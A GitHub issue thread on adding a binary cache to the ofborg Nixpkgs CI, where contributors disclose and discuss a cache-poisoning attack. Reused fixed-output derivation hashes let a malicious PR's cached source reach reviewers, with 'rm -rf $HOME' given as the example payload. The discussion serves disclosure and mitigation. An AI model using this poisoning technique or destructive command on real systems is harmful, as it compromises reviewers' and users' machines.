Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Provide a binary cache for builds #68

Open
Mic92 opened this issue Feb 8, 2018 · 20 comments
Open

Provide a binary cache for builds #68

Mic92 opened this issue Feb 8, 2018 · 20 comments

Comments

@Mic92
Copy link
Member

Mic92 commented Feb 8, 2018

It would be pretty cool, if the builds of ofborg would also be downloadable.
Then maintainers could get quite a lot more pull requests tested in shorter time.

If there would be a url where a expression with expression tarball could be downloaded,
then one could do something like (it should be also possible to provide an actual tarball url for github pull requests)

$ nix-shell 'https://gist.github.com/Mic92/93f65c4d42ac72c8d64397258cada90c/archive/0159f2d6894ea2928e0b05d6ee46349be81681d6.tar.gz' --command 'studio-link'
@Mic92 Mic92 changed the title Provide a binary cache with builds Provide a binary cache for builds Feb 8, 2018
@7c6f434c
Copy link
Member

7c6f434c commented Feb 8, 2018

Wouldn't it make builders a more attractive compromise target? Asking as an operator of a part-time build machine, which I don't take good care of.

@grahamc
Copy link
Member

grahamc commented Feb 8, 2018

@7c6f434c If this was turned on per-builder, would it make all builders an attractive target? ie: if only the AWS machines were able to produce binaries, would you be uncomfortable running your own?

@7c6f434c
Copy link
Member

7c6f434c commented Feb 8, 2018 via email

@domenkozar
Copy link
Member

It seems best to have all builders under one owner (or a few for redundancy) and then use something like https://cachix.org/ to provide a binary cache. In the future, hydra might even reuse that if hydra owners == ofborg build owners.

@ncfavier
Copy link
Member

ncfavier commented Aug 3, 2021

This would be great.

@Mic92
Copy link
Member Author

Mic92 commented Aug 3, 2021

All builders are trusted now afaik. I asked to help @grahamc setting up cachix but got no response so far.

@ncfavier
Copy link
Member

ncfavier commented Aug 3, 2021

Does this actually require modifying ofborg or could we just set up a cachix action somewhere?

@Mic92
Copy link
Member Author

Mic92 commented Aug 3, 2021

@domenkozar
Copy link
Member

I'm happy to sponsor the cache for ofborg (thought I mentioned this earlier here, but I didn't).

@tobiasBora
Copy link

That would be great, but note that one should first solve NixOS/nix#969 otherwise this raises an important security issue, basically allowing any attacker (=person making the PR) to execute arbitrary code on the machine of the reviewer. The issue right now is that the cache is shared between all PR on Ofborg (which makes sense), but combined with NixOS/nix#969 this can be quite dangerous as it is possible to send a malicious (not reviewed) PR containing a malicious code inserted in any program with some hash malicioushash, and then send in a reviewed PR the right PR, except that the hash is malicioushash instead of the valid hash. This way, the reviewer will run the malicious binary, even if the PR actually seems points to a valid source.

@doronbehar
Copy link
Contributor

@tobiasBora could you layout a way how #969 could be abused for such an attack? I'm not sure I understand...

@tobiasBora
Copy link

tobiasBora commented Apr 29, 2024

@doronbehar Sure, I even made a small example ^^

  1. First, the attacker creates a clone of the source of the program, say that is officially located in http://foo.com/example.com/ (this is the URL I used in my tests, it does not exists so if Ofborg does not complain, it means that it used the attacker URL), and adds some malicious code inside (say, that executes rm -rf $HOME when starting), say that the malicious URL is at http://example.com/ (this is what I used in my example, this one exists).
  2. Then the attacker creates a dummy PR like I did here https://github.com/NixOS/nixpkgs/pull/307709/files. The exact content of the PR does not really matter, nobody will even need to review it, so the attacker can write a big Work in progress at the beginning to be sure nobody will check the content. What matters is that it should download the malicious code with something like fetchurl (the hash used here is sha256-6o+sfGX7WJsNU1YPUlH3T56bJDR43Laz6nm142RJyNk= in my test) , and Ofborg should also test it (like it did automatically in my case). This step has basically one goal : pollute the cache of Ofborg with the malicious code.
  3. Then, the attacker creates another PR like I did here https://github.com/NixOS/nixpkgs/pull/307725/files This PR is supposed to contain exactly the code for an honest PR, except that the hash used is not the true hash coming from the upstream project, but the hash used in step 2, sha256-6o+sfGX7WJsNU1YPUlH3T56bJDR43Laz6nm142RJyNk= in my example. As you can see, Ofborg will pass all tests (even if the "official URL" does not even exist), meaning that it used the cache from the first PR.

As of today, if a reviewer tries to review this last PR, they will get an error since the hash does not match the one obtained from the official URL. But if Ofborg & reviewers share the same cache (or even worse, if Hydra and Ofborg share the same cache, this would allow the attack to be executed on any user of the program and not just the reviewer), then the reviewer will basically download the version built by Ofborg, i.e. the malicious one. Just trying to run the program (which is expected from most reviewers) will execute the rm -rf $HOME (or maybe something more subtle like installing a keylogger)… not something I'd love to have, especially from an innocent looking PR.

I just sent an email to the security team with other potential attacks related to #969 that can already be executed now (but in a slightly more convoluted manner), let's see what they say.

@Mic92
Copy link
Member Author

Mic92 commented Apr 30, 2024

We have the same issue by the way in nixpkgs if the attacker controls any package source in nixpkgs and creates a malicious release that contains the source of both the actual package and the package of a second package that has been modified in a malicious way.

@Mic92
Copy link
Member Author

Mic92 commented Apr 30, 2024

So what I think we need is some CI check that will try to download any fixed output derivation that is new and verify it gets the same hash.

@tobiasBora
Copy link

We have the same issue by the way in nixpkgs if the attacker controls any package source in nixpkgs and creates a malicious release that contains the source of both the actual package and the package of a second package that has been modified in a malicious way.

Yes exactly, that was basically part of what I wrote in the email to the security maintainers ^^ (with some other attacks, e.g. relying on obfuscated automatically generated files)

So what I think we need is some CI check that will try to download any fixed output derivation that is new and verify it gets the same hash.

Why should this be a CI check? The attacks would still be possible if I just use a fork of nixpkgs without going through CI… and maybe the reviewers would not wait for the CI to finish before testing the PR themself. Can't we directly modify nix's way of handling fix-output derivation, by basically re-running them whenever an unseen derivation is seen? (seems quite straightforward no?)

@doronbehar
Copy link
Contributor

Can't we directly modify nix's way of handling fix-output derivation, by basically re-running them whenever an unseen derivation is seen? (seems quite straightforward no?)

Sounds not to hard to me too, but the question is, what would you consider an "unseen derivation"? Would you simply make Nix evaluation reevaluate all FODs that are not found in the local cache? Would you consider Hydra's cache safe?

@Mic92
Copy link
Member Author

Mic92 commented Apr 30, 2024

Why should this be a CI check? The attacks would still be possible if I just use a fork of nixpkgs without going through CI… and maybe the reviewers would not wait for the CI to finish before testing the PR themself. Can't we directly modify nix's way of handling fix-output derivation, by basically re-running them whenever an unseen derivation is seen? (seems quite straightforward no?)

I mean I am talking about how to protect cache.nixos.org against cache poisoning at least.

@Mic92
Copy link
Member Author

Mic92 commented Apr 30, 2024

Can't we directly modify nix's way of handling fix-output derivation, by basically re-running them whenever an unseen derivation is seen? (seems quite straightforward no?)

Sounds not to hard to me too, but the question is, what would you consider an "unseen derivation"? Would you simply make Nix evaluation reevaluate all FODs that are not found in the local cache? Would you consider Hydra's cache safe?

We only use the cache if we have verified that that a given <url> produces a given <hash> and is not part of cache.nixos.org.

@tobiasBora
Copy link

We only use the cache if we have verified that that a given produces a given and is not part of cache.nixos.org.

That would indeed be the safest option, but I'm thinking that it might be quite inefficient, as it means that we need to download the source of all the transitive dependencies before even considering downloading something from cache.nixos.org… One can maybe add an option --paranoid for this behavior, and we can maybe enabled for cache.nixos.org (this should anyway not add too much overhead since it already have downloaded anything basically), but this seems quite hard to enforce on the end user… I'm trying to see if we can imagine a solution that is both safe & with a minimal overhead.

Would you simply make Nix evaluation reevaluate all FODs that are not found in the local cache? Would you consider Hydra's cache safe?

That's a good question. So I think we should trust caches like cache.nixos.org (at least once they implement a fix for this issue, since anyway malicious caches could do anything), but I don't think that the current information that is shared by caches is enough. Indeed, for now, the cache says something like "I have a derivation whose hash is foohash but I don't know how it was generated"… which is exactly the same information as what NixOs already tells you, which is, as we saw before, not secure.

So, in my opinion, I think that both users & cache should keep a table derivation path -> hash, and caches should share this table with users. This way, when a user wants to install a program:

  1. first, whenever it finds a FOD (dependency, source…), it will check in its local table if derivation -> hash is present. If it is present, but not correct, abort. If it is present and correct, goto step 4
  2. If it is not present, check on the cache if derivation -> hash is present. Again, check correctness if present and goto step 4
  3. If it is still not present, execute the FOD locally, and check if the hash is correct, otherwise abort.
  4. Once all dependencies have been checked, the rest is as usual: compute as usual the final hash of the program, and ask to the binary cache if is it present. If so, download it, otherwise build it.

Note that one may make this algorithm more efficient (so far it uses many rounds of communication with the server which is not great) by sending a single message to the server with the list of all FOD that could not be checked locally, with their expected hash. If the server sees a single hash mismatch, it aborts, and otherwise sends back the list of FOD that could not be checked.

Hope it make sense!

@risicle
Copy link
Contributor

risicle commented May 6, 2024

So what I think we need is some CI check that will try to download any fixed output derivation that is new and verify it gets the same hash.

I am currently working on such a thing.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

8 participants